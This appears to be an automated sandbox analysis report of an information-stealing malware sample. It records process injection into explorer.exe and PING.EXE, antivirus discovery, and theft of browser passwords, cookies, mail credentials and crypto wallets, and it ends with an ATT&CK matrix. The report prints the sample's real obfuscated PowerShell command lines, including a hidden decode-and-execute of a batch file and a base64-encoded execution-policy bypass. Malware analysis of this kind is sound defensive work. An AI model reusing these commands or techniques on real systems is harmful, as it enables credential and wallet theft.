              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q2microsoft-hyper-v-client-migration-replacement.man
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *|vmware vsphere client*|vcenter5038
              Source: explorer.exe, 00000006.00000000.1728875107.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q+microsoft-hyper-v-migration-replacement.man
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\explorer.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell decode and execute
              Source: Yara matchFile source: amsi64_2908.amsi.csv, type: OTHER
              Creates a thread in another existing process (thread injection)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 11B0000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\System32\taskkill.exe EIP: 3120000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\SysWOW64\PING.EXE EIP: 28E0000
              Encrypted powershell cmdline option found
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $KiULuf='OBqXlPGVGlv';poWerSHell -EXec BYPass -FIle "C:\Users\jones\AppData\Local\Phantom.ps1";$SAUYvmiirIZ='aKOSvBjKvvK'
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $KiULuf='OBqXlPGVGlv';poWerSHell -EXec BYPass -FIle "C:\Users\jones\AppData\Local\Phantom.ps1";$SAUYvmiirIZ='aKOSvBjKvvK'Jump to behavior
              Injects code into the Windows Explorer (explorer.exe)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 2580 base: 11B0000 value: E8Jump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 11B0000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\PING.EXE base: 3120000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\PING.EXE base: 28E0000
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.cmdline"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM ping.exe /FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA2A.tmp" "c:\Users\user\AppData\Local\Temp\mlbsu2za\CSCA5922EEFCE0C4CCF862EBFA9D2B24469.TMP"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.cmdline"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA2A.tmp" "c:\Users\user\AppData\Local\Temp\mlbsu2za\CSCA5922EEFCE0C4CCF862EBFA9D2B24469.TMP"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -tJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES23DA.tmp" "c:\Users\user\AppData\Local\Temp\fhrgxrvn\CSCCE48297965FB4312A543AE9B3ACACFC0.TMP"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXec BYPass -FIle C:\Users\user\AppData\Local\Phantom.ps1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM ping.exe /F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zozwmnym.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES50A7.tmp" "c:\Users\user\AppData\Local\Temp\CSC45E487DD8415477BBDD6263064315E51.TMP"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM ping.exe /FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM ping.exe /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w h -e jablagkavqbmahuazga9accatwbcaheawabsafaarwbwaecabab2accaowbwag8avwblahiauwbiaguababsacaalqbfafgazqbjacaaqgbzafaayqbzahmaiaataeyasqbsaguaiaaiaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabmag8aywbhagwaxabqaggayqbuahqabwbtac4acabzadeaiga7acqauwbbafuawqb2ag0aaqbpahiasqbaad0ajwbhaesatwbtahyaqgbqaesadgb2aesajwa=
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w h -e jablagkavqbmahuazga9accatwbcaheawabsafaarwbwaecabab2accaowbwag8avwblahiauwbiaguababsacaalqbfafgazqbjacaaqgbzafaayqbzahmaiaataeyasqbsaguaiaaiaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabmag8aywbhagwaxabqaggayqbuahqabwbtac4acabzadeaiga7acqauwbbafuawqb2ag0aaqbpahiasqbaad0ajwbhaesatwbtahyaqgbqaesadgb2aesajwa=Jump to behavior
              Source: explorer.exe, 00000006.00000000.1731694645.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730039902.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2923579047.0000000004CE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: explorer.exe, 00000006.00000000.1729081607.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2921051040.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: explorer.exe, 00000006.00000002.2920165193.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1728875107.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
              Source: explorer.exe, 00000006.00000000.1729081607.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2921051040.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: explorer.exe, 00000006.00000000.1729081607.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2921051040.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\PING.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\PING.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\SysWOW64\PING.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\PING.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: PING.EXE, 0000000A.00000002.2192781246.000000000317D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\SysWOW64\PING.EXEWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\SysWOW64\PING.EXEWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected Discord Token Stealer
              Source: Yara matchFile source: Process Memory Space: PING.EXE PID: 7696, type: MEMORYSTR
              Yara detected Generic Stealer
              Source: Yara matchFile source: Process Memory Space: PING.EXE PID: 7032, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: PING.EXE PID: 7696, type: MEMORYSTR
              Yara detected Strela Stealer
              Source: Yara matchFile source: Process Memory Space: PING.EXE PID: 7032, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: bhmlbgebokamljgnceonbncdofmmkedg1Electrum
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Qtum wallets!DashCore"Dash#Litecoin$Bitcoin%Dogecoin)Armory*Bytecoin+bytecoin,MultiBit.exodus.wallet/Ethereum0keystore2ElectrumLTC3Electrum-LTC4AtomicWallet5atomic9WalletWasabi:Client;Wallets<ElectronCash=Sparrow>IOCoin?PPCoin@BBQCoinAMincoinBDevCoinCdevcoinDYACoinEFrankoFFreiCoinGInfiniteCoinHInfinitecoinIGoldCoinGLDJGoldCoin (GLD)KBinanceLTerracoinMDaedalusMainnetNDaedalus MainnetOMyMoneroPMyCryptoQBisqRbtc_mainnetSwalletTBisq_dbUdbVBisq_keysWkeysXZapYSimpleosZsimpleos[Neon\storage]bitmonero_lmdb`EtherwallcElectrum_configeElectrumLTC_configfWalletWasabi_configgConfig.jsonhElectronCash_configiSparrow_configjAtomicDEXkatomic_qtlBinance_wallet_config
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Qtum wallets!DashCore"Dash#Litecoin$Bitcoin%Dogecoin)Armory*Bytecoin+bytecoin,MultiBit.exodus.wallet/Ethereum0keystore2ElectrumLTC3Electrum-LTC4AtomicWallet5atomic9WalletWasabi:Client;Wallets<ElectronCash=Sparrow>IOCoin?PPCoin@BBQCoinAMincoinBDevCoinCdevcoinDYACoinEFrankoFFreiCoinGInfiniteCoinHInfinitecoinIGoldCoinGLDJGoldCoin (GLD)KBinanceLTerracoinMDaedalusMainnetNDaedalus MainnetOMyMoneroPMyCryptoQBisqRbtc_mainnetSwalletTBisq_dbUdbVBisq_keysWkeysXZapYSimpleosZsimpleos[Neon\storage]bitmonero_lmdb`EtherwallcElectrum_configeElectrumLTC_configfWalletWasabi_configgConfig.jsonhElectronCash_configiSparrow_configjAtomicDEXkatomic_qtlBinance_wallet_config
              Source: explorer.exe, 00000006.00000002.2931598954.000000000AB0D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: metroexodus.exe
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Binance\configigfig\Config.json
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Qtum wallets!DashCore"Dash#Litecoin$Bitcoin%Dogecoin)Armory*Bytecoin+bytecoin,MultiBit.exodus.wallet/Ethereum0keystore2ElectrumLTC3Electrum-LTC4AtomicWallet5atomic9WalletWasabi:Client;Wallets<ElectronCash=Sparrow>IOCoin?PPCoin@BBQCoinAMincoinBDevCoinCdevcoinDYACoinEFrankoFFreiCoinGInfiniteCoinHInfinitecoinIGoldCoinGLDJGoldCoin (GLD)KBinanceLTerracoinMDaedalusMainnetNDaedalus MainnetOMyMoneroPMyCryptoQBisqRbtc_mainnetSwalletTBisq_dbUdbVBisq_keysWkeysXZapYSimpleosZsimpleos[Neon\storage]bitmonero_lmdb`EtherwallcElectrum_configeElectrumLTC_configfWalletWasabi_configgConfig.jsonhElectronCash_configiSparrow_configjAtomicDEXkatomic_qtlBinance_wallet_config
              Source: powershell.exe, 00000002.00000002.2250685497.00007FFD9BC60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
              Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a\VERSION.txtJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f\vocab_en.txtJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a\VERSION.txtJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a\VERSION.txt
              Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f\vocab_en.txtJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
              Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
              Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f\vocab_en.txt
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\SysWOW64\PING.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: Yara matchFile source: 00000017.00000002.2494654093.000000000478C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PING.EXE PID: 7032, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: PING.EXE PID: 7696, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Discord Token Stealer
              Source: Yara matchFile source: Process Memory Space: PING.EXE PID: 7696, type: MEMORYSTR
              Yara detected Generic Stealer
              Source: Yara matchFile source: Process Memory Space: PING.EXE PID: 7032, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: PING.EXE PID: 7696, type: MEMORYSTR
              Yara detected Strela Stealer
              Source: Yara matchFile source: Process Memory Space: PING.EXE PID: 7032, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information11
              Scripting              		Valid Accounts41
              Windows Management Instrumentation              		11
              Scripting              		1
              DLL Side-Loading              		11
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              File and Directory Discovery              		Remote Services11
              Archive Collected Data              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		312
              Process Injection              		11
              Deobfuscate/Decode Files or Information              		LSASS Memory34
              System Information Discovery              		Remote Desktop Protocol2
              Data from Local System              		1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts3
              PowerShell              		2
              Registry Run Keys / Startup Folder              		2
              Registry Run Keys / Startup Folder              		1
              Obfuscated Files or Information              		Security Account Manager141
              Security Software Discovery              		SMB/Windows Admin Shares1
              Email Collection              		1
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Software Packing              		NTDS2
              Process Discovery              		Distributed Component Object Model1
              Clipboard Data              		1
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets41
              Virtualization/Sandbox Evasion              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
